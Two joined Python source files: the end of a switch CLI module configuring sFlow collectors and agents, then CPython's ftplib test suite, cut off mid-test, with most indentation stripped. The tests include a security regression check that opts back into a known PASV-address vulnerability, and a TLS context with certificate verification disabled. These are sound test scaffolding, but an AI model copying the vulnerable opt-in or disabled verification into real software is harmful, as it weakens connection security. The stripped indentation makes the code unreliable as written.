@click.argument('rate', metavar='<sample_rate>', required=True, type=int)
@click.pass_context
def sample_rate(ctx, ifname, rate):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo('Invalid interface name')
return
if not is_valid_sample_rate(rate):
click.echo('Error: Sample rate must be between 256 and 8388608')
return
sess_dict = config_db.get_table('SFLOW_SESSION')
if sess_dict and ifname in sess_dict:
sess_dict[ifname]['sample_rate'] = rate
config_db.mod_entry('SFLOW_SESSION', ifname, sess_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'sample_rate': rate})
#
# 'sflow collector' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def collector(ctx):
"""Add/Delete a sFlow collector"""
pass
def is_valid_collector_info(name, ip, port, vrf_name):
if len(name) > 16:
click.echo("Collector name must not exceed 16 characters")
return False
if port not in range(0, 65535 + 1):
click.echo("Collector port number must be between 0 and 65535")
return False
if not clicommon.is_ipaddress(ip):
click.echo("Invalid IP address")
return False
if vrf_name != 'default' and vrf_name != 'mgmt':
click.echo("Only 'default' and 'mgmt' VRF are supported")
return False
return True
#
# 'sflow' command ('config sflow collector add ...')
#
@collector.command()
@click.option('--port', required=False, type=int, default=6343,
help='Collector port number')
@click.option('--vrf', required=False, type=str, default='default',
help='Collector VRF')
@click.argument('name', metavar='<collector_name>', required=True)
@click.argument('ipaddr', metavar='<IPv4/v6_address>', required=True)
@click.pass_context
def add(ctx, name, ipaddr, port, vrf):
"""Add a sFlow collector"""
ipaddr = ipaddr.lower()
if not is_valid_collector_info(name, ipaddr, port, vrf):
return
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if (collector_tbl and name not in collector_tbl and len(collector_tbl) == 2):
click.echo("Only 2 collectors can be configured, please delete one")
return
config_db.mod_entry('SFLOW_COLLECTOR', name,
{"collector_ip": ipaddr, "collector_port": port,
"collector_vrf": vrf})
return
#
# 'sflow' command ('config sflow collector del ...')
#
@collector.command('del')
@click.argument('name', metavar='<collector_name>', required=True)
@click.pass_context
def del_collector(ctx, name):
"""Delete a sFlow collector"""
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if name not in collector_tbl:
click.echo("Collector: {} not configured".format(name))
return
config_db.mod_entry('SFLOW_COLLECTOR', name, None)
#
# 'sflow agent-id' group
#
@sflow.group(cls=clicommon.AbbreviationGroup, name='agent-id')
@click.pass_context
def agent_id(ctx):
"""Add/Delete a sFlow agent"""
pass
#
# 'sflow' command ('config sflow agent-id add ...')
#
@agent_id.command()
@click.argument('ifname', metavar='<interface_name>', required=True)
@click.pass_context
def add(ctx, ifname):
"""Add sFlow agent information"""
if ifname not in netifaces.interfaces():
click.echo("Invalid interface name")
return
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' in sflow_tbl['global']:
click.echo("Agent already configured. Please delete it first.")
return
sflow_tbl['global']['agent_id'] = ifname
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow agent-id del')
#
@agent_id.command('del')
@click.pass_context
def delete(ctx):
"""Delete sFlow agent information"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' not in sflow_tbl['global']:
click.echo("sFlow agent not configured.")
return
sflow_tbl['global'].pop('agent_id')
config_db.set_entry('SFLOW', 'global', sflow_tbl['global'])
if __name__ == '__main__':
config()
test_ftplib.py
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import threading
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
# We use this as the string IPv4 address to direct the client
# to in response to a PASV command, in order to test security
# behavior (see https://bugs.python.org/issue43285).
self.fake_pasv_server_ip = '252.253.254.255'
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0)) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
ip = self.fake_pasv_server_ip
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0),
family=socket.AF_INET6) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
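# Minimal standalone sketch (hypothetical class, not used by the tests) of the
# dispatch pattern in DummyFTPHandler.found_terminator above: the first word of
# the command line is lower-cased and resolved to a cmd_<verb> method via
# getattr(), with a 550 reply when no handler exists.
class _ExampleDispatcher:
    def __init__(self):
        self.replies = []

    def push(self, reply):
        self.replies.append(reply)

    def handle_line(self, line):
        verb, _, arg = line.partition(" ")
        method = getattr(self, "cmd_" + verb.lower(), None)
        if method is None:
            self.push('550 command "%s" not understood.' % verb.lower())
        else:
            method(arg)

    def cmd_noop(self, arg):
        self.push("200 noop ok")

# d = _ExampleDispatcher(); d.handle_line("NOOP"); d.replies == ['200 noop ok']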
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitivity
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_makepasv_issue43285_security_disabled(self):
"""Test the opt-in to the old vulnerable behavior."""
self.client.trust_server_pasv_ipv4_address = True
bad_host, port = self.client.makepasv()
self.assertEqual(
bad_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((self.client.sock.getpeername()[0], port),
timeout=TIMEOUT).close()
def test_makepasv_issue43285_security_enabled_default(self):
self.assertFalse(self.client.trust_server_pasv_ipv4_address)
trusted_host, port = self.client.makepasv()
self.assertNotEqual(
trusted_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((trusted_host, port), timeout=TIMEOUT).close()
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024), LIST_DATA.encode('ascii'))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
# consume from SSL socket to finalize handshake and avoid
# "SSLError [SSL] shutdown while in init"
self.assertEqual(sock.recv(1024), LIST_DATA.encode('ascii'))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024), LIST_DATA.encode('ascii'))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
